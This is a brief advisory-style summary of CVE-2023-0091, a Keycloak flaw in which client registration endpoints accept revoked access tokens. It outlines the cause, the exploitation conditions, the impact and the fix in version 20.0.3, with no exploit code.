CVE-2023-0091

Vulnerability

CVE-2023-0091 is a flaw in Keycloak where the client registration endpoints do not properly check whether an access token has been revoked during the client credential flow [1][2]. This means that even if a service account token is explicitly revoked, Keycloak continues to accept it for operations that require create-client or manage-clients roles [4]. The root cause is missing revocation validation on these specific endpoints.

Exploitation

An attacker who obtains a leaked or stolen access token for a service account with sufficient privileges can use it against the client registration endpoints. No additional authentication is needed beyond possessing the revoked token. The attacker can then create new clients or modify existing client configurations [4]. The attack is performed over the network and requires no special position beyond being able to send HTTP requests to the Keycloak server.

Impact

Successful exploitation lets the attacker access or modify potentially sensitive information managed by Keycloak [2]. By creating or altering clients, the attacker could intercept authentication flows, gain unauthorized access to other applications, or exfiltrate data. The flaw directly undermines the token revocation mechanism, which is a critical security control for identity and access management platforms.

Mitigation

Red Hat has issued a fix in Keycloak version 20.0.3 and later [4]. Organizations running affected versions (earlier than 20.0.3) should upgrade immediately. No workaround is documented; patching is the only recommended remediation.